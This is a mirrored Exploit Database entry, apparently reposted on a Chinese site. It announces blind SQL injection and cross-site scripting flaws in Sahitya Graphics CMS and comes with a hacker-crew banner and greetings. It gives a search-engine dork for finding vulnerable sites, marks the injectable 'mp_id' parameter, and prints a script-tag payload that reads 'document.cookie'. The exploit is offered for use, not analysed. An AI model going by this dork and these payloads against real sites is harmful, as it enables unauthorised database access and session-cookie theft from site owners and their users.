sahitya graphics CMS – Multiple Vulnerabilities

• Exploit Database
• 85 阅读

• 作者： Dr.0rYX & Cr3W-DZ
  日期： 2010-11-21
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15592/

•  
   Exploit Title:Sahitya Graphics CMS Multiple Remote Vulnerabilities
   Date: 12.10.2010
   Author: Dr.0rYX and Cr3w-DZ
   Category: webapps/0day
  
  ****************************************************************************************************
  * _______ ___________.__ ___________.__*
  *____ \ _\______\_____/||__ _____\_ _____/______|__| ____ _____*
  * /\//_\\___ \|| ||\ ______ \__\|__) \___ \|/ ___\\__\ *
  *| |\\_/ \| \/|| | Y\ /_____// __ \_| \ || \/\\___ / __ \_ *
  *|___|/\_____/__| |____| |___|/ (____/\___/ |__||__|\___>____/ *
  * \/ \/ \/ \/ \/\/ \/*
  *.____ __*
  *______ ____ ______ _________|__|/|_ ___.__. _/|_____ __________ *
  * /___// __ \_/ ___\||\___ \\ __< || \ __\/ __ \\__\/ \*
  * \___ \\___/\\___||/|| \/|||\___||| \___/ / __ \|Y Y\ *
  */____>\___>\___>____/ |__||__||__|/ ____||__|\___>____/__|_|/ *
  * \/ \/ \/ \/ \/ \/\/*
  *Pr!v8 Expl0iT AND t00l ** *
  *ALGERIAN HACKERS*
  *********************************- NORTH-AFRICA SECURITY TEAM -*************************************
   
  [!]Sahitya Graphics CMS Multiple Remote Vulnerabilities 
  [!] Author: Dr.0rYX and Cr3w-DZ
  [!] MAIL: sniper-dz@hotmail.de<mailto:sniper-dz@hotmail.de>&Cr3w@hotmail.de<mailto:Cr3w@hotmail.de>
   
  ***************************************************************************/
  [!] notice :
   Dr.0rYX:MY OLD EMAIL VX3@HOTMAIL.DECLOSED
   MY NEW EMAIL ISSNIPER-DZ@HOTMAIL.DE
  
  ***************************************************************************/
  [ Software Information ]
   
  [+] Vendor : http://www.sahityagraphics.com.au/
  [+] script : Sahitya Graphics CMS
  [+] Download :http://www.sahityagraphics.com.au/overview.html (sell script )
  [+] Vulnerability : BLIND SQL injection Vulnerability / XSS Vulnerability
  [+] Dork : inurl:"index.php?mp_id=" Sahitya
   
  **************************************************************************/
  [ Vulnerable File 1]
   
  http://server/index.php?mp_id=sql[N.A.S.T ]
  
  [ Exploit 1 ]
   
  http://server/index.php?mp_id=1 BLIND SQL INJECTION 
  
  
  *************************************************************************/
  [ Vulnerable File 2]
  
  http://server/index.php?mp_id=xss[N.A.S.T ]
  
  [ Exploit 2 ]
  http://www.server/index.php?mp_id='><script>alert(document.cookie)</script>
  
  [GReet ]
   
  [+] : Exploit-db.com , all hackers muslims	 	 		
  

  Python

  Copy